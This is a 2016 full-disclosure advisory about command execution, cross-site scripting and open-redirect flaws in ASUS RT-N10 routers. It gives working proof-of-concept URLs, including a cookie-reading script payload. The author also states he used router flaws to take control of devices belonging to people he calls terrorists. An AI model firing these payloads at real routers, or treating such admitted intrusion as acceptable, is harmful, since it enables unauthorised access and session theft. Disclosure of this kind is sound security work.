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Message-ID: <005801d20eca$3a44b650$9b7a6fd5@pc>
Date: Wed, 14 Sep 2016 23:53:50 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>,
<fulldisclosure@...lists.org>
Subject: [FD] Multiple vulnerabilities in ASUS RT-N10
Hello list!
There are multiple vulnerabilities in ASUS Wireless Router RT-N10. There are
Code Execution, Cross-Site Scripting and URL Redirector Abuse
vulnerabilities.
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Affected products:
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Vulnerable are the next models: ASUS RT-N10, RT-N10E, RT-N10LX and RT-N10U
with different versions of firmware. I checked in RT-N10 with firmware
version 1.9.2.7.
Asus ignored vulnerabilities in RT-G32, RT-N15 and RT-N10, which I sent them
during 2015. At 03.12.2015 I informed Asus about vulnerabilities in RT-N15
with mentioning about similar ones in RT-N10.
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Details:
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Code Execution (OS Commanding) (WASC-31):
In section System Command it's possible to execute system commands. The code
also can be executed via CSRF attack.
http://site/Main_AdmStatus_Content.asp
cat /proc/version
Cross-Site Scripting (WASC-08):
http://site/apply.cgi?current_page=javascript:alert(document.cookie) (in old
browsers)
http://site/apply.cgi?current_page=%22%3E%3Cbody%20onload=alert%28document.cookie%29%3E
URL Redirector Abuse (WASC-38):
http://site/apply.cgi?current_page=http://google.com
http://site/apply.cgi?next_host=http://google.com
I found this and other routers in 2014-2015 to take control over terrorists
in Crimea, Donetsk and Lugansks regions of Ukraine. Read in the list
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2016-September/010823.html).
I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/8322/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
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